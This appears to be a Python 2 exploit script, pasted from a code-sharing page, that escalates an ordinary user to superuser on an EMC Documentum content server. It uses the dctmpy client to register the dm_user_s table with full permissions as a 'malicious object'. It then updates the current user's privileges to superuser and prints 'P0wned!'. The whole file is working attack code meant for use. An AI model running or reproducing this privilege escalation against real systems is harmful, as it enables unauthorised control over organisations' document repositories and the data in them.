#!/usr/bin/env pythonimport socketimport sysfrom os.path import basenamefr

1. #!/usr/bin/env python
2.  
3. import socket
4. import sys
5. from os.path import basename
6.  
7. from dctmpy.docbaseclient import DocbaseClient
8. from dctmpy.obj.typedobject import TypedObject
9.  
10. CIPHERS = "ALL:aNULL:!eNULL"
11.  
12.  
13. def usage():
14. print "usage:\n\t%s host port user password" % basename(sys.argv[0])
15.  
16.  
17. def main():
18. if len(sys.argv) != 5:
19. usage()
20. exit(1)
21.  
22. print "Trying to connect to %s:%s as %s ..." % (sys.argv[1], sys.argv[2], sys.argv[3])
23. (session, docbase) = create_session(*sys.argv[1:5])
24.  
25. if is_super_user(session):
26. print "Current user is a superuser, nothing to do"
27. exit(1)
28.  
29. print "Acquiring ID for malicious object ..."
30. id = session.next_id(0x00)
31. print "Acquired %s\nTrying to create following malicious object:" % id
32. obj = TypedObject(session=session)
33. obj.set_string("OBJECT_TYPE", "dm_registered")
34. obj.set_bool("IS_NEW_OBJECT", True)
35. obj.set_int("i_vstamp", 0)
36. obj.set_string("table_name", "dm_user_s")
37. obj.set_string("table_owner", docbase)
38. obj.set_string("owner_name", docbase)
39. obj.set_int("world_permit", 7)
40. obj.set_string("object_name", "dm_user_s")
41. obj.set_string("r_object_type", "dm_registered")
42. obj.set_int("owner_table_permit", 15)
43. obj.set_int("group_table_permit", 15)
44. obj.set_int("world_table_permit", 15)
45. print obj.dump()
46. if not session.save(id, obj):
47. print "Failed"
48. exit(1)
49. print "Becoming superuser..."
50. r = session.query(
51. "UPDATE dm_dbo.dm_user_s SET "
52. "user_privileges=16 WHERE user_name=USER") \
53. .next_record()[
54. 'rows_updated']
55. if r != 1:
56. print "Failed"
57. exit(1)
58. print "P0wned!"
59.  
60.  
61. def create_session(host, port, user, pwd, identity=None):
62. print "Trying to connect to %s:%s as %s ..." % \
63. (host, port, user)
64. session = None
65. try:
66. session = DocbaseClient(
67. host=host, port=int(port),
68. username=user, password=pwd,
69. identity=identity)
70. except socket.error, e:
71. if e.errno == 54:
72. session = DocbaseClient(
73. host=host, port=int(port),
74. username=user, password=pwd,
75. identity=identity,
76. secure=True, ciphers=CIPHERS)
77. else:
78. raise e
79. docbase = session.docbaseconfig['object_name']
80. version = session.serverconfig['r_server_version']
81. print "Connected to %s:%s, docbase: %s, version: %s" % \
82. (host, port, docbase, version)
83. return (session, docbase)
84.  
85.  
86. def is_super_user(session):
87. user = session.get_by_qualification(
88. "dm_user WHERE user_name=USER")
89. if user['user_privileges'] == 16:
90. return True
91. group = session.get_by_qualification(
92. "dm_group where group_name='dm_superusers' "
93. "AND any i_all_users_names=USER")
94. if group is not None:
95. return True
96.  
97. return False
98.  
99.  
100. if __name__ == '__main__':
101. main()